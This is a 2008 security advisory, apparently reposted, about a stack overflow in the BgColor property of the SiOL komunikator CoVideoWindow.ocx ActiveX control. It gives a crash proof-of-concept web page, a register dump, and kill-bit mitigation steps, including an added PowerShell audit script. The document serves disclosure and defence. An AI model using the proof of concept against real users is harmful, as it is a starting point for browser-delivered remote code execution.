SiOL komunikator IM ActiveX stack overflow condition

Vulnerability ID: 1052571    Vulnerability type:
Published: 2008-08-07    Updated: 2008-08-07
CVE ID: N/A    CNNVD ID: N/A
Platform: N/A    CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2008080033
|Details
Vulnerability details have not yet been disclosed.
|Exploit
=========================================================================

	  SiOL komunikator IM ActiveX stack overflow condition

=========================================================================

 Release date:    30.7.2008
 Severity:        Moderately critical
 Impact:          Stack overflow
 Remote:          Yes
 Status:          Unpatched
 Software:        SiOL Komunikator v1.3 (SLO_71130)
 Tested on:       Microsoft Windows XP SP3 / IE6 SP3
 Developer:       http://www.siol.net/
                  http://www.eyeball.com/
 Disclosed by:    Edi Strosar


Vendor's description of affected application:
=============================================
"SiOL komunikator is instant messaging software that supports comprehensive communication with text messages, file exchange, and the option of voice and video calls, without a telephone set and from any location where an Internet connection is available."

English translation (sort of):
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP.

Download link:
http://www.siol.net/spletne_storitve/siol_komunikator.aspx


ActiveX control overview:
=========================
 Developer: Eyeball Networks, Inc.
 Version: 5.0.907.1
 Component: CoVideoWindow.ocx
 GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 KillBitSet: False


Description:
============
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to a stack overflow condition in its BgColor() method, which may lead to remote code execution. The vulnerability can be triggered when a user with SiOL komunikator installed visits a specially crafted web page.


Proof of concept:
=================
The following test case crashes Internet Explorer:

<html>
 <!-- instantiate the vulnerable control by its CLSID -->
 <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>
 <input language=VBScript onclick=buffero() type=button value="Crash">
 <script language='vbscript'>
  Sub buffero()
   ' 515000-byte string of "A" assigned to the BgColor property
   crash = String(515000, unescape("%41"))
   test.BgColor = crash
  End Sub
 </script>
</html>

Note: close all Internet Explorer instances before executing the PoC!

Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.


Exception overview:
===================
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
 EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01
 EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02
 ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
 EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B
              --> TEST [ECX],EAX
----------------------------------------------------------------


Mitigation:
===========
Set the kill bit (http://support.microsoft.com/kb/240797).

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]
"Compatibility Flags"=dword:00000400
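As an added example (not part of the original advisory), the PowerShell script below audits the registry state of the control described above and, if it is registered and not yet killed, sets the kill bit without clobbering other Compatibility Flags. It checks the same registry facts listed in the "ActiveX control overview" (kill bit, and the "safe for scripting"/"safe for initialization" component categories, whose standard CATIDs are assumed here); the IObjectSafety interface is a runtime property and is not visible in the registry. Setting the value requires an elevated prompt.

```powershell
# Added example, not from the original advisory. Audits and optionally sets
# the Internet Explorer kill bit for the CoVideoWindow.ocx CLSID above.
$Clsid = '{CA06EE71-7348-44C4-9540-AAF0E6BD1515}'   # CLSID from the advisory

# Standard component-category CATIDs (assumed well-known values, not from the page).
$CatSafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

function Get-ActiveXSafetyStatus {
    param([Parameter(Mandatory)][string]$Clsid)

    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = 0
    if (Test-Path $compatKey) {
        $item = Get-ItemProperty -Path $compatKey -ErrorAction SilentlyContinue
        if ($null -ne $item.'Compatibility Flags') { $flags = [int]$item.'Compatibility Flags' }
    }

    $clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $catKey   = "$clsidKey\Implemented Categories"

    [pscustomobject]@{
        Clsid            = $Clsid
        Registered       = Test-Path $clsidKey
        KillBitSet       = ($flags -band 0x400) -ne 0      # 0x400 = kill bit
        SafeForScripting = Test-Path "$catKey\$CatSafeForScripting"
        SafeForInit      = Test-Path "$catKey\$CatSafeForInit"
    }
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)

    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }

    # Preserve any flags already present and OR in the kill bit.
    $existing = (Get-ItemProperty -Path $compatKey -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]($existing -as [int])) -bor 0x400
    Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -Value $new -Type DWord
}

$before = Get-ActiveXSafetyStatus -Clsid $Clsid
$before | Format-List
if ($before.Registered -and -not $before.KillBitSet) {
    Set-ActiveXKillBit -Clsid $Clsid
    Get-ActiveXSafetyStatus -Clsid $Clsid | Format-List   # expect KillBitSet = True
}
```

Registry paths are case-insensitive, so the mixed-case "44c4" spelling used elsewhere in the advisory refers to the same key.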


Timeline:
=========
12.07.2008 - initial developer notification
	   - no response
20.07.2008 - additional developer notification
	   - no response
30.07.2008 - public disclosure


Contact:
========
edi [dot] strosar [at] gmail [dot] com


Disclaimer:
===========
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.

=========================================================================